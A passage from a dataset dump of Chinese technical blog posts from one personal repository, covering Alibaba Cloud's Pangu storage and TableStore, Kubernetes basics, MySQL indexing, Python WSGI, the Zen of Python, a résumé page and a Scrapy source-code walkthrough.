具体的事件处理器:实现了应用程序的某个服务。每个具体的事件处理器总和一个描述符相关。它使用描述符来识别事件,识别应用成所提供的服务。\n\n- Reactor管理器(Reactor):定义了一些接口,用于应用程序控制事件的调度,以及应用程序注册、删除事件处理器和相关的描述符。是事件处理器的调度核心。使用同步事件分离器来等待事件发生,一旦事件发生,Reactor先分离每个事件,然后调度事件处理器,最后调用相关的模板函数来处理这个事件。\n\n### 参考文献\n[高性能网络编程5--IO复用与并发编程](https://blog.csdn.net/russell_tao/article/details/17119729)\n[IO - 同步,异步,阻塞,非阻塞 (亡羊补牢篇)](https://blog.csdn.net/historyasamirror/article/details/5778378)\n[高性能网络编程6--reactor反应堆与定时器管理](https://blog.csdn.net/russell_tao/article/details/17452997)"
},
{
"alpha_fraction": 0.7965031862258911,
"alphanum_fraction": 0.8024930953979492,
"avg_line_length": 26.215858459472656,
"blob_id": "97eb492c0b4cccd40a2a67b021aa741a293440f3",
"content_id": "995dff06cb3193108079fc6637a373bb8a7f0b5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 13831,
"license_type": "no_license",
"max_line_length": 258,
"num_lines": 227,
"path": "/source/_posts/pangu.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 阿里云分布式存储系统的研究与分享\ndate: 2018-04-13 21:08:17\ncategories: 分布式\ntags: [分布式, 系统设计]\n---\n\n### 云计算介绍\n云计算是一种弹性的计算模式,以虚拟化为基础,以网络为中心,为用户提供安全、快速、便捷的数据存储和网络计算服务, 包括所需要的硬件、平台、软件及服务等资源,而提供资源的网络就被称为“云”。\n达到让用户像使用水、电、煤气等资源一样便捷、高效。\n服务类型:\n - IaaS(基础设施即服务)\n - PaaS(平台即服务)\n - SaaS(软件即服务)\n - FaaS(函数即服务)\n\n### 阿里云计算\n阿里云计算主要围绕下面几个方面提供服务\n - 虚拟化\n主要对应的阿里云产品是弹性计算,包括弹性计算服务ECS、弹性伸缩、容器服务、函数计算等等\n - 存储&数据库\n主要是分布式存储,包括块存储、文件存储、CDN、RDS、OceanBase等等\n - 网络\n包括负责均衡SLB、VPC、NAT网关、高速通道等等\n - 安全\n包括DDoS 基础防护、云防火墙、堡垒机等等\n - 大数据应用及分析\nMaxCompute、流计算、EMR、推荐引擎、机器学习、图像识别、自然语言处理等等\n - 中间件\n包括消息服务、日志服务、搜索服务、云服务总线CSB、应用配置管理等等\n - 管理与工具\n计费计量、云监控、资源编排、访问控制RAM等等\n\n### 飞天开发平台\n\n飞天---阿里云计算核心平台,支撑了阿里云弹性计算、中间件、网络、数据库、大数据存储、大数据计算等服务。\n从设计图上可以看出,他包括盘古、伏羲、神农等等几个核心子系统。\n我们今天主要介绍盘古分布式存储系统,和在他之上的产品(主要是表格存储)的设计和实现\n\n### 分布式存储\n** 定义:**\n使用大量普通 PC 服务器通过网络互联,对外作为一个整体提供存储服务。\n** 存储的数据类型分类:**\n - 分布式文件系统\n通常作为分布式表格、分布式数据库的底层存储;常见的AWS Dynamo,Google GFS等\n - 分布式key-value系统\n主要存储关系简单的半结构化数据,只提供基于主键的CRUD。是分布式表格的一种简化实现,一般用作缓存\n - 分布式表格系统\n阿里云的TableStore\n - 分布式数据库\n阿里云OceanBase、HBase等\n\n### 数据存储产品\n\n\n共享块存储支持将一个共享块存储挂载到多个ECS上,这个可以解决我们之前去重模块跟etl必须在一台机器上部署的问题。\n目前在阿里云上大概有三种方式解决:\n - 1.通过共享块存储\n - 2.通过NAS\n - 3.通过云存储网关,本质上是通过NFS协议使用OSS来实现\n\n### 弹性块存储EBS\n弹性块存储是阿里云为ECS云服务器提供的块设备,高性能、低时延,满足随机读写,可以像使用物理硬盘一样格式化、创建文件系统。可用于大部分通用业务场景下的数据存储。\n主要产品:各种云盘\n\n从设计图上可以看出EBS是在盘古的基础上开发了一个块存储网关。\n** 块存储网关主要功能:**\n - 一是负责磁盘虚拟化:将后端盘古存储空间映射为本地盘(我们在阿里云上使用的ECS,是通过虚拟化的方式使用宿主机的cpu、内存、存储等等,这个有兴趣的话可以研究下)\n - 二是存储协议转换:IO请求转发到盘古Client\n\n\n### 表格存储TableStore\n表格存储是构建在阿里云飞天分布式系统之上的 NoSQL 数据存储服务,提供海量结构化数据的存储和实时访问。\n表格存储以实例和表的形式组织数据,通过数据分片和负载均衡,达到规模的无缝扩展。\n表格存储向应用程序屏蔽底层硬件平台的故障和错误,能自动从各类错误中快速恢复,提供非常高的服务可用性。\n表格存储管理的数据全部存储在 SSD 中并具有多个备份,提供了快速的访问性能和极高的数据可靠性。\n\n** 表格存储核心竞争力 **\n - 大数据模型\n - 分布式 + LSM(Log Structured Merge Trees)存储引擎:水平扩展,海量存储,高吞吐写入能力\n - 动态负载均衡,热点快速迁移\n - 自动连续分裂\n - 读写性能不受并发及数据存储规模影响\n - 数据生命周期\n - 完善的数据通道\n - 离线全量通道(CDP):对接离线计算引擎,数据分层\n - 实时增量通道(DTS):对接实时计算或搜索引擎,增量同步\n - 存储与计算结合\n - 打通在线存储、离线计算和实时分析的数据闭环\n - 容灾\n - 同城双集群、两地三中心和单元化\n - 成本优化\n - 计算成本:按量付费,资源包\n - 存储成本:低存储成本容量型实例,分级存储,优化压缩\n\n### 表格存储系统架构\n\n首先是用户层,我们使用的SDK,系统将用户使用SDK的请求通过SLB分发到多个Proxy(其实是内部的Client)上,这里实现Proxy的高可用。\n然后Proxy与TableMaster和TableWorker交互,完成用户请求。\nTableMaster和TableWorker、盘古、伏羲后面会有介绍\n\n\n - Proxy:负责鉴权及Meta数据缓存,协议转换等\n - Master:\n负责表级的元数据管理,建表、删表;分片的调度;自动的分片、负载均衡(将不同分片调度到空闲的TableWorker来加载);容错等\n - Table Worker:\n主要负责分区数据加载,读写数据、行锁等。为了提高性能,内部也会维护一个缓存(这个后面会介绍)\n\n接着是存储子系统盘古和调度子系统伏羲:\n - 1.表格存储的数据实际是在盘古,由盘古来提供数据的可靠存储,后面有盘古的介绍,这里不展开。\n - 2.调度子系统伏羲 配合TableMaster做调度,伏羲知道集群中机器的负载情况,协助TableMaster做调度。\n\n从这个图可以看出表格存储&盘古的整体设计有点类似ceph的设计,TableMaster和盘古可独立扩展。\n\n### 表格存储高可用—Failover\n\n** Master Failover: **\n由于表格存储的元数据是存储在盘古上的,所以数据容量 原则上是没有限制的(扩展性问题)。也由于盘古提供的可靠共享存储,表格存储的Master可以做到无状态,这样就比较容易的实现高可用。\n\n从这个图上可以看出,Master进程Crash或者机器宕机是由伏羲负责拉起,然后收集分区加载信息,但这样可能会有一段时间的不可用(咨询了表格存储的技术支持,可能是在对外的资料中隐藏了一些技术细节,但他说的小集群3个Master,大集群5个Master,在加上使用的是盘古共享存储,猜测这里应该跟HDFS的NameNode一样,使用zookeeper选主实现Master高可用)。\n\n** Table Worker Failover: **\n由于元数据存储在盘古上,所以当Table Worker宕掉后,分区可以直接由新的Table Worker来加载\n\n### 表格存储高性能-自动连续分裂\n\n - 1.表格存储支持连续的自动分裂(也是一种负责均衡的实现)。\n由于表格存储使用第一个主键列分片,而且数据是按主键列排序的,所以在当分片过大或者过热时可以很容易的分片,再加上表格存储的数据分区是逻辑单位,实际的数据存储在盘古(共享存储的好处),所以在分裂时,不需要迁移数据,可以很快完成分裂。\n\n - 2.由于表格存储是基于LSM(Log Structured Merge Trees)的,在数据写入或者更新的时候,会先写入commitlog进行持久化,然后再写入内存中的MemTable,MemTable会定期的flush成一个新的数据文件,后台定期对不同的数据文件进行合并,合并为一个更大的数据文件,并清理垃圾数据等。\n\n - 
3.表格存储一张表的每个分片都拥有独立的commitlog,每次修改的内容都会append写入commitlog。当节点故障时,内存中的MemTable还未flush成数据文件,此时发生failover,分片被另外的TableWorker加载,只需要重新replay一部分commitlog即可恢复MemTable,保证写入的数据不丢。\n\n\n\n### 分布式存储系统-盘古\n - 高可靠\n - 多副本强一致\n - 端到端的数据校验、静默错误的检查 \n - 高可用\n - 多租户隔离\n - 基于Paxos的多组Master\n - Federation支持水平扩展\n - 高性能\n - 混合存储:SSD作为SATA盘Cache\n - 内存零拷贝\n - 数据处理流水线化增大吞吐\n - 低成本\n - 集群间共享数据\n - EC(Erasure Coding)等\n\n### 盘古架构\n\n三个模块:Master、Client、Chunk Server\n了解HDFS实现的人应该很熟悉这个图,盘古同HDFS一样采用(主从)master/slave设计。一个存储集群是由一组Master和一定数目的Chunk Server组成,在数据读写时Client先请求Master获取到数据存储的元数据,之后的数据读写,Client就直接跟Chunk Server交互了。Chunk Server和Master保持心跳,向Master反馈数据状态以及接受Master的指令。大部分的分布式存储系统设计都差不多,其中OpenStack的Ceph区别较大,代表了分布式块存储设计的方向。\n\n为了好理解,这里引用的是盘古1.0的设计图,盘古2.0主要的变化主要是Master节点在高可用上变化。\n\n### 盘古Master\n对应HDFS的NameNode,负责元数据管理,最主要的就是维护两个映射关系:\n - 文件名到数据块;\n - 数据块到Chunk Server列表。\n\n其中文件名到数据块的信息保存在磁盘上(持久化);但Master不保存数据块到Chunk Server列表,这个是通过Chunk Server在启动时的上报数据块信息,更新Master上的映射表。\nMaster暴露了文件系统的名字空间,用户可以 以文件的形式在上面存储数据。\nMaster在分布式文件系统中需要解决的三个核心问题:\n - 容量以Federation方式水平扩展\n - 高效数据流量动态规划实现最大吞吐\n - 高可用:Paxos数据一致,防止单点\n\n### 盘古Chunk Server\n对应HDFS的DataNode,负责数据存储,一般是多台组成集群。\n存储过程中,一个文件被分成一个或多个数据块(至少一个),这些块存储在多个Chunk Server上,每块数据通过多副本来保证可靠性以及加快后期的读取速度。Chunk Server负责处理分布式文件系统客户端的实际的读写数据请求。在Master的统一调度下进行数据块的创建、删除和复制。\n - 三副本强一致\n三副本位于不同的故障域(rack),故障时自动多点数据复制\n - 端到端的数据校验,静默错误检查\n - 心跳\n与Master维护心跳,上报机器状态;接收Master指令;\n - 混合存储提高写入性能、EC降低存储成本\n\n### Master扩展性\n** 可扩展:** 不成为系统瓶颈,能随数据服务器数量的增多而线性扩展 \n - 元数据的容量不成为系统瓶颈 \n - 服务请求能力不成为系统瓶颈 \n\n** 常用的实现方式:**\n - Federation\n\n### 盘古Master扩展性-Federation\n\n\n跟HDFS一样,基于Federation实现Master水平扩展。\n\nFederation使用了多个独立的Namespace,namenode之间相互独立且不需要互相协调,各自分工,管理自己的区域。\n\n分布式的datanode被用作通用的数据块存储存储设备。每个datanode要向集群中所有的namenode注册,且周期性地向所有namenode发送心跳和块报告,并执行来自所有namenode的命令。\n\n一个block pool由属于同一个namespace的数据块组成,每个datanode可能会存储集群中所有block pool的数据块。每个block pool内部自治,也就是说各自管理各自的block,不会与其他block pool交流。一个namenode挂掉了,不会影响其他namenode。\n\n某个namenode上的namespace和它对应的block pool一起被称为namespace volume(命名空间卷)。它是管理的基本单位。当一个namenode/nodespace被删除后,其所有datanode上对应的block pool也会被删除。当集群升级时,每个namespace volume作为一个基本单元进行升级。\n\n### 高可用实现方式\n\n** 高可用 ** :不成为故障单点\n - 多个备份,故障时快速切换\n - 保证状态一致性\n\n** 常用的实现方式:**\n - 主从同步\n - 分布式协议\n\n### 高可用实现方式-主从模式\n\nHDFS的实现方式,\n - 1)分布式锁互斥实现选主(ZK)\n - 2)通过共享存储实现数据一致性,HDFS是使用NFS作为共享存储\n - 3)通过心跳检测故障\n\n### 盘古Master高可用实现方式-分布式协议\n\n - 1)使用Paxos一致性协商协议,保证高可用和快速切换\n - 2)不依赖外部共享存储和互斥锁服务,独立自包含\n\n其实,了解到盘古是基于Raft协议实现的类Paxos协议。现在很多公司的分布式存储都采用Raft协议实现一致性,感兴趣的可以研究下。\n\nMaster高性能,通过使用Raid卡(或者闪存),提高Meta的读写性能。\n由于raid卡是带cache,并且是有电池的,所以在掉电的情况下可以电池放电周期内不丢失数据,所以,master可以在写入raid卡后就返回客户端成功,后台离线将缓存中的数据刷入后端SATA硬盘中。"
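上面提到的“先写commitlog、再写MemTable、定期flush成数据文件、failover时replay日志恢复”的LSM写入路径,可以用下面几行Python示意(仅为理解思路,和盘古/表格存储的真实实现无关):

```python
# LSM 写入路径最小示意:只演示 commitlog/MemTable/flush/恢复 的关系,非真实实现
class MiniLSM:
    def __init__(self, flush_threshold=3):
        self.commitlog = []     # 模拟磁盘上的追加日志
        self.memtable = {}      # 内存表,这里简化为 dict
        self.sstables = []      # 已 flush 的不可变数据文件
        self.flush_threshold = flush_threshold

    def put(self, key, value):
        self.commitlog.append((key, value))  # 1.先追加写日志,保证掉电不丢
        self.memtable[key] = value           # 2.再写 MemTable
        if len(self.memtable) >= self.flush_threshold:
            self.sstables.append(dict(self.memtable))  # 3.定期 flush 成数据文件
            self.memtable.clear()
            self.commitlog.clear()           # flush 之后对应日志即可回收

    def recover(self):
        # failover 时只需 replay commitlog,即可重建未落盘的 MemTable
        self.memtable = dict(self.commitlog)

    def get(self, key):
        # 读路径:先查 MemTable,再从新到旧查数据文件
        if key in self.memtable:
            return self.memtable[key]
        for sst in reversed(self.sstables):
            if key in sst:
                return sst[key]
        return None

db = MiniLSM()
for i in range(4):
    db.put('k%d' % i, i)
print(db.get('k0'), db.get('k3'))  # 0 3
```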
},
{
"alpha_fraction": 0.6460738778114319,
"alphanum_fraction": 0.6599307060241699,
"avg_line_length": 13.081300735473633,
"blob_id": "19dfa45d73ff37c812691bf59747d8bb4e7f2a5a",
"content_id": "f84b79b53b3206a010c457255ccc2ea229f57050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2244,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 123,
"path": "/source/_posts/the-zen-of-python.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "title: 'The Zen Of Python'\ndate: 2014-07-01 11:07:53\ncategories: Python #文章文类\ntags: [Zen,python] #文章标签,多于一项时用这种格式\n---\n\n## The Zen Of Python\n\n补充些Python方面的文化,文章翻译自[http://legacy.python.org/dev/peps/pep-0020/](http://legacy.python.org/dev/peps/pep-0020/ \"PEP 20 -- The Zen of Python\")\n\t\n### Beautiful is better than ugly.\n\n``` bash\n\t整洁胜于杂乱\n```\n\n### Explicit is better than implicit.\n\n``` bash\n\t明了胜于隐晦\n```\n\n### Simple is better than complex.\n\n``` bash\n\t简单胜于复杂\n```\n\n### Complex is better than complicated.\n\n``` bash\n\t复杂胜于混乱\n```\n\n### Flat is better than nested.\n\n``` bash\n\t递推胜于嵌套\n````\n\n### Sparse is better than dense.\n\n``` bash\n\t稀疏胜于稠密\n```\n\n### Readability counts.\n\n``` bash\n\t可读性是最重要的---易读\n```\n\n### Special cases aren't special enough to break the rules.\n\n``` bash\n\t特例不足以打破规则\n```\n\n### Although practicality beats purity.\n\n``` bash\n\t但是,实用性胜于纯粹套用\n```\n\n### Errors should never pass silently.\n\n``` bash\n\t错误不应该不报\n```\n\n### Unless explicitly silenced.\n\n``` bash\n\t除非另有明确的目的\n```\n\n### In the face of ambiguity, refuse the temptation to guess.\n\n``` bash\n\t不清楚的,不能去猜\n```\n\n### There should be one-- and preferably only one --obvious way to do it.\n\n``` bash\n\t总会有一种方式来解决问题,并且通常只有一种\n```\n\n### Although that way may not be obvious at first unless you're Dutch.\n\n``` bash\n\t然而,这种解决问题的方式在一开始不是那么的明了,除非你有先见之明\n```\n\n### Now is better than never.\n\n``` bash\n\t现在,有一种不明了的解决方案比从来没有好\n```\n\n### Although never is often better than *right* now.\n\n``` bash\n\t然而,仓促的解决不然没有\n```\n\n### If the implementation is hard to explain, it's a bad idea.\n\n``` bash\n\t如果方案不明确,就是个坏的想法\n```\n\n### If the implementation is easy to explain, it may be a good idea.\n\n``` bash\n\t相反,则是个好的主意\n```\n\n### Namespaces are one honking great idea -- let's do more of those!\n\n``` bash\n\t名字空间是个好的设计,我们应该好好的使用它\n```\n"
},
{
"alpha_fraction": 0.8298192620277405,
"alphanum_fraction": 0.8388554453849792,
"avg_line_length": 30.140625,
"blob_id": "ddd2b1b3813f21769f4958e32aad2ff235c788e6",
"content_id": "3af3f4061f2ef0e1fce04bfb12cc520303b73bf6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4078,
"license_type": "no_license",
"max_line_length": 208,
"num_lines": 64,
"path": "/source/_posts/k8s1.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Kubernetes入门\ndate: 2018-06-14 22:26:16\ncategories: Kubernetes\ntags: [Kubernetes,k8s]\n---\n\nKubernetes是一个完备的分布式系统支撑平台,具有完备的集群管理能力,包括多层次的安全防护和准入机制、多租户应用支撑能力,透明的服务注册和服务发现机制,内建智能负载均衡器,强大的故障发现和自我修复能力,服务滚动升级和在线扩容能力,可扩展的资源和自动调度机制,以及多粒度的资源配额管理能力。所以,Kubernetes是一个全新的基于容器技术的分布式架构解决方案,并且是一个一站式的完备的分布式系统开发和支撑平台。\n\n遵从Kubernetes的设计思想,传统系统架构中的和业务无关的底层代码和功能模块,都可以立刻从我们的视线中消失,我们不必再费心于负载均衡器的选型和部署实施问题,不必考虑引入或自研一个复杂的服务治理框架,不必头疼服务监控和故障处理模块的开发。总之,使用Kubernetes提供 的解决方案,我们节省不少于30%的开发成本。\n\n\n** Kubernetes中几个重要的概念:**\n\n#### Master:\n- kube-apiserver:所有资源的增删改查的唯一入口\n- kube-controller-manager:所有资源对象的自动化控制中心\n- kube-scheduler:资源调度(pod调度)\n- etcd server:存储进程\n- Node:\n- kubelet:负责Pod对应的容器的创建、启停等,与Master节点密切协作,实现集群管理\n- kube-proxy:实现Kubernetes service的通信与负载均衡\n- Docker Engine:负责本机容器创建和管理\n\n#### Pod:\n- Pause:跟容器\n- containers:多个用户业务相关的容器\n每个Pod一个ip称为Pod ip\n\n##### Pod的运行状态:\n- Pending:API Server已经创建Pod,但所需要的容器镜像还没有创建,或者正在下载\n- Running:Pod内所有容器都创建了,且至少一个容器处于运行状态、正在启动状态或者正在重启状态\n- Succeeded:Pod内所有容器都成功执行退出,且不会再重启\n- Failed:Pod内所有容器均已退出,但至少有一个容器退出为失败状态\n- Unknown:无法获取该Pod的状态\n##### Pod的重启策略(RestartPolicy)\n- Always:默认,当容器失效时,由kubelet自动重启该容器\n- OnFailure:当容器终止运行且退出码非0时,由kubelet自动重启该容器\n- Never:不重启\n##### Pod的健康检查\n- LivenessProbe探针:存活检测,如果LivenessProbe探针探测到容器不健康,则由kubelet将其杀掉,并根据重启策略做相应的处理。如果一个容器不包含LivenessProbe探针,那么kubelet认为容器的LivenessProbe探针一直返回‘success’\n- ReadinessProbe探针:判断容器是否启动启动完成(ready),可以接收请求。如果ReadinessProbe探测到失败,则Pod的状态将被修改。Endpoint Controller将从Service的Endpoint中删除包含该容器所在Pod的Endpoint。\n##### Pod的调度:\n- NodeSelector:根据label调度\n- NodeAffinity:亲和性调度,更灵活\n- DaemonSet的Pod调度:在每个Node只运行一个Pod\n- Job批处理调度\n\n#### RC:\n主要功能之一是自动部署一个容器应用的多个副本,并持续监控副本数量,在集群内始终维持指定副本数\n- 通过定义RC实现Pod的创建及副本数量的自动控制\n- RC里包括完整的Pod定义模板\n- RC通过Label Selector实现对Pod副本的自动控制\n- 通过改变RC中Pod的副本数量,实现Pod的弹性伸缩\n- 通过改变RC里Pod模板的镜像版本,实现Pod的滚动升级\n\n#### PV:\n- 可以理解为Kubernetes集群中某个网络存储中对应的一块存储\n- 只能是网络存储,不属于任何Node,但可以在每个Node上访问\n- 并不是定义在Pod上的,而是独立于Pod之外定义\n- PV目前只有几种类型:GCE Persistent Disks、NFS、RBD、iSCSCI、AWS EBS、GFS等\n\n#### Service:\n主要目的是在Pod对外服务的前端加一层负载均衡,因为Pod的ip地址可能是会改变。"
},
{
"alpha_fraction": 0.49788135290145874,
"alphanum_fraction": 0.633474588394165,
"avg_line_length": 11.756756782531738,
"blob_id": "d9fe2b9e01cb374767e8041d47d853b97e2e2e0a",
"content_id": "2924308fb41d03a960bfad02eb4b6fd2bc579f81",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 768,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 37,
"path": "/source/resume/index.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 潜心积累、野蛮成长\ndate: 2018-06-09 21:34:24\ncomments: false\n---\n\n### 关于我\n\n八零后程序员,北漂10来年,于2019年初来到深圳。\n\n> Email: [email protected]\n> 博客:https://blog.7street.top\n> GitHub:https://github.com/polarisary\n\n### 工作经历\n> 2015.12 ~ 2019.3 智线科技 \n> 2012.2 ~ 2015.12 京东商城\n\n### 技术经历\n> 做过推荐系统\n> 在云平台待过\n> 熟悉爬虫相关\n> 了解一点K8S、Docker\n> 努力学习架构中\n\n### 编程语言\n- Java\n- Python\n- PHP\n\n### 教育经历\n> 中国地质大学(北京) - 信息工程学院 - 计算机应用【2009.9 ~ 2012.7】\n> 河南理工大学 - 计算机学院 - 计算机科学与技术【2005.9 ~ 2009.7】 \n\n### 其他 \n喜欢打篮球、羽毛球\n爱跑步\n"
},
{
"alpha_fraction": 0.5846154093742371,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 12.100000381469727,
"blob_id": "bd0e7fba6fbc01167c45fdd0cffdaba561a9465e",
"content_id": "c02098e52169606e734d29deb8d852e4ca57de03",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 25,
"num_lines": 10,
"path": "/source/_posts/mysql-lock.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: mysql_lock\ndate: 2018-01-06 21:35:41\ncategories: MySQL\ntags: MySQL\n---\n\n### 以下是这周学习MySql锁相关知识的脑图:\n\n"
},
{
"alpha_fraction": 0.7421320080757141,
"alphanum_fraction": 0.7614213228225708,
"avg_line_length": 31.866666793823242,
"blob_id": "5094e2c1df29f1db4d905286329f96f329315faf",
"content_id": "a1edcccaca97c7e19d7ea3bd53678f39d94f7151",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 235,
"num_lines": 30,
"path": "/source/_posts/python-web.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Python Web流程\ndate: 2018-02-08 20:40:41\ncategories: Python\ntags: [Python,Web]\n---\n\n### 流程上大概分三层:\n 1. web服务器层\n a. 主要包括Nginx、Apache等\n 2. WSGI层\n a. Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范\n 3. web 应用层\n a. 主要包括Flash、Django等\n\n\n### 几个相关概念:\n**CGI(Common Gateway Inteface)**:外部应用程序与Web服务器之间的接口标准\n\n**FastCGI**: CGI的一个扩展, 提升了性能,废除了 CGI fork-and-execute (来一个请求 fork 一个新进程处理,处理完再把进程 kill 掉)的工作方式,转而使用一种长生存期的方法,减少了进程消耗,提升了性能。\n\n**WSGI(Python Web Server GateWay Interface)**:它是用在 python web 框架编写的应用程序与后端服务器之间的规范(本例就是 Django 和 uWSGI 之间),让你写的应用程序可以与后端服务器顺利通信。在 WSGI 出现之前你不得不专门为某个后端服务器而写特定的 API,并且无法更换后端服务器,而 WSGI 就是一种统一规范, 所有使用 WSGI 的服务器都可以运行使用 WSGI 规范的 web 框架,反之亦然。\n\n**uWSGI**: 是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。用于接收前端服务器转发的动态请求并处理后发给 web 应用程序。\n\n**uwsgi**: 是uWSGI服务器实现的独有的协议, 网上没有明确的说明这个协议是用在哪里的,我个人认为它是用于前端服务器与 uWSGI 的通信规范,相当于 FastCGI的作用。\n - WSGI看过前面小节的同学很清楚了,是一种通信协议。\n - uwsgi同WSGI一样是一种通信协议。\n - 而uWSGI是实现了uwsgi和WSGI两种协议的Web服务器。\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7843137383460999,
"avg_line_length": 25.179487228393555,
"blob_id": "940e5cdb620706b9979930cd3a7c498b9583250c",
"content_id": "34d4aa93557a092edb623c6aab289f72ac77c11f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2328,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 39,
"path": "/source/_posts/MySQL索引补充.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySQL单列索引和多列索引\ndate: 2018-01-31 11:53:50\ncategories: MySQL\ntags: [MySQL,多列索引,单列索引]\n---\n在设计MySql表索引的时候,可能有个问题,就是多个单列索引好,还是设计为多列索引好;下面从不同角度分析下这个问题;\n** 1.多个单列索引:**\n定义:即是在表中在需要索引的字段上为每个字段设计一个索引;\n特点:简单,索引个数多\n\n** 2.多列索引:**\n定义:即是在表中根据查询需求在多个字段上设计一个索引;\n特点:稍微复杂,需要考虑索引顺序;\n\n** 3.性能上的对比 **\n- 多个单列索引的情况下,MySql在执行查询时,如果where条件中是使用and连接各种过滤条件的,那么MySql会选择其中一个限制最严格的索引(区分度最高的)。\n- 多列联合索引中由于索引是考虑索引字段顺序的,根据InnoDB中B-Tree的实现原理,单个索引限制再严格也没有多列限制严格,所以在多列索引的情况下数据库扫描更少的行,可以在较短的时间内返回数据;\n\n** 4.判断依据 ** \n主要使用MySql的查询计划来判断执行器在查询数据的时候到底使用哪个索引,主要的依据是根据执行计划的Extra字段,下面是Extra在不同情况下代表的使用不同类型的索引\nExtra:\n - Using index:直接使用索引,覆盖索引的情况,可以通过索引直接返回所需数据。\n - Using indexc ondition:使用索引,但需要回表查询相关数据\n\n** 5.覆盖索引 ** \n定义:查询所需数据通过索引可以直接获取到,不需要回表查询数据行;\n - Select查询返回列包含在索引列中\n - where条件包含索引列或复合索引的前导列\n - 查询结果的总字段长度可以接受\n\n** 6.索引合并 ** \n在索引设计不太合理的时候,MySql可能会对一些查询执行索引合并\n - 在多个单列索引的情况下,\n + where条件的索引列使用or连接时,会触发索引合并\n + where条件的索引列使用and连接时,通常会选择限制最严格的索引,这个时候联合索引(多列索引)比较合适\n - 合并标识\n + 使用 explain 可看到 type:index_merge\n - 触发索引合并,说明当前索引设计的比较糟糕"
},
{
"alpha_fraction": 0.6338438391685486,
"alphanum_fraction": 0.6366479992866516,
"avg_line_length": 43.157142639160156,
"blob_id": "5f2f58ab27eda24c1bf2c8b708ffc46c7ab81766",
"content_id": "98634861db3312b34cb5497b8e75901a44a4fcfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10772,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 210,
"path": "/source/_posts/scrapy-flow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapy整体抓取流程\ndate: 2018-06-06 21:36:01\ncategories: 源码研究 #文章文类\ntags: [Scrapy,源码,python] #文章标签,多于一项时用这种格式\n---\n\n看代码过程中整理的一张思维导图,对理解整个流程有帮助。\n\n\n从启动示例说起:\n```\n\timport scrapy\n\tfrom scrapy.crawler import CrawlerProcess\n\n\tclass MySpider1(scrapy.Spider):\n\t # Your first spider definition\n\t ...\n\n\tclass MySpider2(scrapy.Spider):\n\t # Your second spider definition\n\t ...\n\n\tprocess = CrawlerProcess()\n\tprocess.crawl(MySpider1)\n\tprocess.crawl(MySpider2)\n\tprocess.start() # the script will block here until all crawling jobs are finished\n```\n\n这是官方推荐的在一个进程启动多个Spider的示例;先实例化一个CrawlerProcess实例,这个就是一个Scrapy进程,接着添加两个Spider,并且启动进程,看起来很简单,下面结合源代码分析Scrapy是怎么完成抓取的。\n\nCrawlerProcess继承自CrawlerRunner,上面示例中CrawlerProcess实例化后,调用crawl方法添加Spider,看看具体代码执行了什么?\n```\n def crawl(self, crawler_or_spidercls, *args, **kwargs):\n crawler = self.create_crawler(crawler_or_spidercls)\n return self._crawl(crawler, *args, **kwargs)\n def _crawl(self, crawler, *args, **kwargs):\n self.crawlers.add(crawler)\n d = crawler.crawl(*args, **kwargs)\n self._active.add(d)\n def _done(result):\n self.crawlers.discard(crawler)\n self._active.discard(d)\n return result\n return d.addBoth(_done)\n```\n可以看出这里是用参数Spider创建了个crawler,并且调用crawler的crawl方面。顺藤摸瓜看看Crawler.crawl()方法到底干了什么?\n```\n @defer.inlineCallbacks\n def crawl(self, *args, **kwargs):\n assert not self.crawling, \"Crawling already taking place\"\n self.crawling = True\n try:\n self.spider = self._create_spider(*args, **kwargs)\n self.engine = self._create_engine()\n start_requests = iter(self.spider.start_requests())\n yield self.engine.open_spider(self.spider, start_requests)\n yield defer.maybeDeferred(self.engine.start)\n except Exception:\n if six.PY2:\n exc_info = sys.exc_info()\n self.crawling = False\n if self.engine is not None:\n yield self.engine.close()\n if six.PY2:\n six.reraise(*exc_info)\n raise\n```\n这里创建Spider,创建engine。接着调用engine.open_spider(),engine.start(),这个流程先打住,待会回过头来再接下来分析这里。先看下示例代码最后一步process.start()。\n```\n def start(self, stop_after_crawl=True):\n if stop_after_crawl:\n d = self.join()\n # Don't start the reactor if the deferreds are already fired\n if d.called:\n return\n d.addBoth(self._stop_reactor)\n reactor.installResolver(self._get_dns_resolver())\n tp = reactor.getThreadPool()\n tp.adjustPoolsize(maxthreads=self.settings.getint('REACTOR_THREADPOOL_MAXSIZE'))\n reactor.addSystemEventTrigger('before', 'shutdown', self.stop)\n reactor.run(installSignalHandlers=False) # blocking call\n```\n这里引入了Twisted的事件循环并启动,之后上面的engine会注册相关的方法到事件循环中执行。接着上面engine分析。看看open_spider()干了什么?start()很简单,这里不介绍。\n```\n 